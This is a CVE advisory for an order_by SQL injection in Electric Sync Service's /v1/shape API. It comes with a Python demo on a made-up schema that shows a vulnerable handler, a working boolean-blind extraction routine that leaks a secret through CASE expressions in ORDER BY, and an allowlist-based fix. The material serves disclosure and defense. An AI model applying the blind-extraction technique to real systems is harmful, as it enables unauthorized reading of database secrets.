CRITICAL
electric-sql
CVE published 2026-04-21
CVE-2026-40906
CVE-2026-40906 is a critical SQL injection vulnerability in Electric Sync Service versions from 1.1.12 up to, but not including, 1.5.0. The flaw is in the order_by parameter of the /v1/shape API: an authenticated user can supply SQL in that parameter and have it executed, which could let them read, write, and destroy the full contents of the underlying PostgreSQL database. The Electric SQL team has addressed this issue in version 1.5.0 [truncated]
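The bug class described above, shown as an added example that is not Electric's code and says nothing about the actual payload used against the /v1/shape endpoint: a hypothetical handler that pastes a caller-supplied order_by into the query text, a boolean-blind extraction that works through nothing but the sort order, and an allowlist-validated replacement. The schema, table names and secret are constructed for the demo; SQLite stands in for PostgreSQL.

```python
import re
import sqlite3

# Constructed sample schema for the demo; not Electric's schema.
SCHEMA = """
CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE secrets (id INTEGER PRIMARY KEY, token TEXT);
INSERT INTO items VALUES (1, 'apple'), (2, 'banana'), (3, 'cherry');
INSERT INTO secrets VALUES (1, 'hunter2');
"""


def connect() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def shape_query_vulnerable(table: str, order_by: str) -> str:
    """Hypothetical shape handler: the caller-supplied order_by is pasted straight
    into the SQL text, so it is executed as SQL rather than treated as a column name."""
    return f"SELECT id, name FROM {table} ORDER BY {order_by}"


def leak_token_blind(conn: sqlite3.Connection,
                     alphabet: str = "abcdefghijklmnopqrstuvwxyz0123456789") -> str:
    """Boolean-blind extraction through the vulnerable ORDER BY: a CASE expression sorts
    ascending when the guess is right and descending otherwise, so the id of the first
    returned row answers one yes/no question per request. No error or extra column needed."""
    token = ""
    while True:
        pos = len(token) + 1
        for ch in alphabet:
            payload = (f"CASE WHEN (SELECT substr(token, {pos}, 1) FROM secrets) = '{ch}' "
                       f"THEN id ELSE -id END")
            rows = conn.execute(shape_query_vulnerable("items", payload)).fetchall()
            if rows[0][0] == 1:  # ascending order => the guessed character was correct
                token += ch
                break
        else:
            return token  # no character matched at this position: end of the secret


# One order term: a bare identifier, an optional direction keyword, nothing else.
ORDER_TERM = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)\s*(ASC|DESC)?\s*$", re.IGNORECASE)


def table_columns(conn: sqlite3.Connection, table: str) -> set:
    """Build the allowlist from the catalogue so order_by can only name real columns."""
    known = {r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")}
    if table not in known:
        raise ValueError(f"unknown table: {table!r}")
    return {r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')}


def shape_query_safe(conn: sqlite3.Connection, table: str, order_by: str) -> str:
    """Hardened variant: parse order_by into (column, direction) pairs, reject anything
    that is not a known column, and re-emit the terms as quoted identifiers. The user's
    string never reaches the SQL text; only names the server already knows do."""
    columns = table_columns(conn, table)
    terms = []
    for raw in order_by.split(","):
        m = ORDER_TERM.match(raw)
        if not m or m.group(1) not in columns:
            raise ValueError(f"invalid order_by term: {raw.strip()!r}")
        direction = (m.group(2) or "ASC").upper()
        terms.append(f'"{m.group(1)}" {direction}')
    return f'SELECT id, name FROM "{table}" ORDER BY ' + ", ".join(terms)


def order_by_is_accepted(conn: sqlite3.Connection, table: str, order_by: str) -> bool:
    """True if the hardened parser would let this order_by through."""
    try:
        shape_query_safe(conn, table, order_by)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    db = connect()
    print("leaked through the vulnerable handler:", leak_token_blind(db))
    print(db.execute(shape_query_safe(db, "items", "name DESC")).fetchall())
    print("injection accepted by hardened handler:",
          order_by_is_accepted(db, "items", "CASE WHEN 1=1 THEN id ELSE -id END"))
```

ORDER BY is a common place for this mistake because a column name cannot be sent as a bound parameter, so developers fall back to string formatting. The fix is not escaping but structure: parse the parameter into a small grammar and map each piece onto identifiers the server already knows. Note that the blind probe above never needs an error message or a second result column, which is why "it only controls sort order" is not a mitigation.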